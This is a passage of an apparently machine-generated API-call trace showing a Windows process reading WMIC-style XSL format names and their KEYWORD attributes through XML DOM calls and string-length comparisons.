out: resultList=0x350027f4b0*=0x233e1a2ca30) returned 0x0 [0050.169] IXMLDOMNodeList:get_length (in: This=0x233e1a2ca30, listLength=0x350027f680 | out: listLength=0x350027f680*=21) returned 0x0 [0050.169] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=0, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.169] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0 [0050.170] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.170] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.170] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0050.170] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.170] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.170] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.170] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=1, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.170] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="textvaluelist.xsl") returned 0x0 [0050.170] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.170] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.171] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0050.171] SysStringLen (param_1="VALUE") returned 0x5 [0050.171] SysStringLen (param_1="TABLE") returned 0x5 [0050.171] SysStringLen (param_1="TABLE") returned 0x5 [0050.171] SysStringLen (param_1="VALUE") returned 0x5 [0050.171] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.171] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.171] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.171] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=2, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.171] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="textvaluelist.xsl") returned 0x0 [0050.171] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.171] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.171] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0050.171] SysStringLen (param_1="LIST") returned 0x4 [0050.171] SysStringLen (param_1="TABLE") returned 0x5 [0050.171] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.171] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.171] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.171] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=3, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.172] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="rawxml.xsl") returned 0x0 [0050.172] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.172] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.172] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0050.172] SysStringLen (param_1="RAWXML") returned 0x6 [0050.172] SysStringLen (param_1="TABLE") returned 0x5 [0050.172] SysStringLen (param_1="RAWXML") returned 0x6 [0050.172] SysStringLen (param_1="LIST") returned 0x4 [0050.172] SysStringLen (param_1="LIST") returned 0x4 [0050.172] SysStringLen (param_1="RAWXML") returned 0x6 [0050.172] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.172] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.172] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.172] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=4, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.172] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="htable.xsl") returned 0x0 [0050.172] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.172] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.172] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0050.172] SysStringLen (param_1="HTABLE") returned 0x6 [0050.172] SysStringLen (param_1="TABLE") returned 0x5 [0050.173] SysStringLen (param_1="HTABLE") returned 0x6 [0050.173] SysStringLen (param_1="LIST") returned 0x4 [0050.173] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.173] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.173] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.173] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=5, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.173] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="hform.xsl") returned 0x0 [0050.173] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.173] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.173] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0050.173] SysStringLen (param_1="HFORM") returned 0x5 [0050.173] SysStringLen (param_1="TABLE") returned 0x5 [0050.173] SysStringLen (param_1="HFORM") returned 0x5 [0050.173] SysStringLen (param_1="LIST") returned 0x4 [0050.173] SysStringLen (param_1="HFORM") returned 0x5 [0050.173] SysStringLen (param_1="HTABLE") returned 0x6 [0050.173] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.173] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.173] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.173] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=6, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.173] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="xml.xsl") returned 0x0 [0050.173] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.173] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.174] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0050.174] SysStringLen (param_1="XML") returned 0x3 [0050.174] SysStringLen (param_1="TABLE") returned 0x5 [0050.174] SysStringLen (param_1="XML") returned 0x3 [0050.174] SysStringLen (param_1="VALUE") returned 0x5 [0050.174] SysStringLen (param_1="VALUE") returned 0x5 [0050.174] SysStringLen (param_1="XML") returned 0x3 [0050.174] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.174] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.174] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.174] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=7, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.174] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="mof.xsl") returned 0x0 [0050.174] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.174] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.174] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0050.174] SysStringLen (param_1="MOF") returned 0x3 [0050.174] SysStringLen (param_1="TABLE") returned 0x5 [0050.174] SysStringLen (param_1="MOF") returned 0x3 [0050.174] SysStringLen (param_1="LIST") returned 0x4 [0050.174] SysStringLen (param_1="MOF") returned 0x3 [0050.174] SysStringLen (param_1="RAWXML") returned 0x6 [0050.174] SysStringLen (param_1="LIST") returned 0x4 [0050.174] SysStringLen (param_1="MOF") returned 0x3 [0050.175] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.175] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.175] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.175] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=8, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.175] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="csv.xsl") returned 0x0 [0050.175] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.175] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.175] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0050.175] SysStringLen (param_1="CSV") returned 0x3 [0050.175] SysStringLen (param_1="TABLE") returned 0x5 [0050.175] SysStringLen (param_1="CSV") returned 0x3 [0050.175] SysStringLen (param_1="LIST") returned 0x4 [0050.175] SysStringLen (param_1="CSV") returned 0x3 [0050.175] SysStringLen (param_1="HTABLE") returned 0x6 [0050.175] SysStringLen (param_1="CSV") returned 0x3 [0050.175] SysStringLen (param_1="HFORM") returned 0x5 [0050.175] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.175] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.176] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.176] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=9, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.176] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0 [0050.176] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.176] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.176] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0050.176] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.176] SysStringLen (param_1="TABLE") returned 0x5 [0050.176] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.176] SysStringLen (param_1="VALUE") returned 0x5 [0050.176] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.176] SysStringLen (param_1="XML") returned 0x3 [0050.176] SysStringLen (param_1="XML") returned 0x3 [0050.176] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.176] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.176] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.176] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.176] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=10, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.176] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0 [0050.176] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.176] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.177] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0050.177] SysStringLen (param_1="texttablewsys") returned 0xd [0050.177] SysStringLen (param_1="TABLE") returned 0x5 [0050.177] SysStringLen (param_1="texttablewsys") returned 0xd [0050.177] SysStringLen (param_1="XML") returned 0x3 [0050.177] SysStringLen (param_1="texttablewsys") returned 0xd [0050.177] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.177] SysStringLen (param_1="XML") returned 0x3 [0050.177] SysStringLen (param_1="texttablewsys") returned 0xd [0050.177] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.177] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.177] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.177] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=11, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.177] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0 [0050.177] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.177] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.177] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0050.177] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.177] SysStringLen (param_1="TABLE") returned 0x5 [0050.177] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.177] SysStringLen (param_1="XML") returned 0x3 [0050.177] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.177] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.177] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.177] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.178] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.178] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.178] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.178] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=12, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.178] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0 [0050.178] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.178] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.178] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0050.178] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.178] SysStringLen (param_1="TABLE") returned 0x5 [0050.178] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.178] SysStringLen (param_1="XML") returned 0x3 [0050.178] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.178] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.178] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.178] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.178] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.178] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.178] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.178] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.178] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.178] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=13, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.179] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0 [0050.179] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.179] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.179] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0050.179] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.179] SysStringLen (param_1="TABLE") returned 0x5 [0050.179] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.179] SysStringLen (param_1="XML") returned 0x3 [0050.179] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.179] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.179] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.179] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.179] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.179] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.179] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.179] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.179] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.179] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=14, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.179] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0 [0050.179] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.179] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.180] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.180] SysStringLen (param_1="TABLE") returned 0x5 [0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.180] SysStringLen (param_1="XML") returned 0x3 [0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.180] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.180] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.180] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0050.180] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0050.180] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.180] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.180] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.180] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=15, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.180] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="htable.xsl") returned 0x0 [0050.180] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.180] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.180] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.181] SysStringLen (param_1="TABLE") returned 0x5 [0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.181] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.181] SysStringLen (param_1="XML") returned 0x3 [0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.181] SysStringLen (param_1="texttablewsys") returned 0xd [0050.181] SysStringLen (param_1="XML") returned 0x3 [0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.181] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.181] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.181] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.181] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=16, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.181] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="htable.xsl") returned 0x0 [0050.181] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.181] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.181] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0050.181] SysStringLen (param_1="htable-sortby") returned 0xd [0050.181] SysStringLen (param_1="TABLE") returned 0x5 [0050.181] SysStringLen (param_1="htable-sortby") returned 0xd [0050.181] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.181] SysStringLen (param_1="htable-sortby") returned 0xd [0050.181] SysStringLen (param_1="XML") returned 0x3 [0050.181] SysStringLen (param_1="htable-sortby") returned 0xd [0050.181] SysStringLen (param_1="texttablewsys") returned 0xd [0050.181] SysStringLen (param_1="htable-sortby") returned 0xd [0050.181] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0050.181] SysStringLen (param_1="XML") returned 0x3 [0050.181] SysStringLen (param_1="htable-sortby") returned 0xd [0050.181] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.181] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.182] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.182] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=17, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.182] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="mof.xsl") returned 0x0 [0050.182] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 [0050.182] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0 [0050.182] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0050.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.182] SysStringLen (param_1="TABLE") returned 0x5 [0050.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.182] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.182] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0050.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.182] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0050.182] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0050.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0050.182] IUnknown:Release (This=0x233e1a2d070) returned 0x0 [0050.182] IUnknown:Release (This=0x233e1a296d0) returned 0x0 [0050.182] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0 [0050.182] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=18, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0 [0050.182] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="mof.xsl") returned 0x0 [0050.182] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0 